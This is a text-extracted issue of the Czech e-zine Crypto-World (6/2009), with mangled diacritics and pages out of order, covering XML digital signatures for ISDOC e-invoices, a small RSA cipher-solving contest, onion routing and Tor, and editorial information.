Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

Podpora formaacutetu externiacutemi naacutestroji Pro uacutečely podpory průmysloveacuteho nasazeniacute formaacutetu ISDOC již existujiacute i externiacute naacutestroje Jeden z nich vyvinula firma ABRA Software a pojmenovala jej ISDOCReader Jde o freeware tj program kteryacute je možneacute kdykoliv staacutehnout z přiacuteslušneacute adresy (wwwisdocorg) a začiacutet jej volně použiacutevat Tento naacutestroj provede po instalaci asociaci s oběma variantami formaacutetu ISDOC (isdoc i isdocx) a stane se tak vyacutechoziacutem prohliacutežečem tohoto formaacutetu ISDOCReader dovoluje libovolnyacute fakturačniacute doklad zobrazit do vizuaacutelniacute podoby faktury ověřit přiacuteslušnyacutem tlačiacutetkem elektronickyacute podpis dokladu přiacutepadně si doklad i vytisknout Je takeacute možneacute prohliacutežet a exportovat přiacutepadneacute přiacutelohy faktury Dalšiacutem krokem bdquoworkflowldquo zpracovaacuteniacute došleacute elektronickeacute faktury v menšiacute firmě je pak jejiacute postoupeniacute k automatickeacutemu či poloautomatickeacutemu zpracovaacuteniacute do ISERP přiacutejemce k čemuž je opět přiacuteslušneacute tlačiacutetko Technicky bude možnost odeslaacuteniacute dokladu do libovolneacuteho ISERP vyřešena pomociacute konfiguračniacuteho souboru kteryacute si každyacute vyacuterobce bude moci daacutet do sveacute instalace a kteryacute ISDOCReader bude volat

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 9: Sešit 6/2009 (452 kB)

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

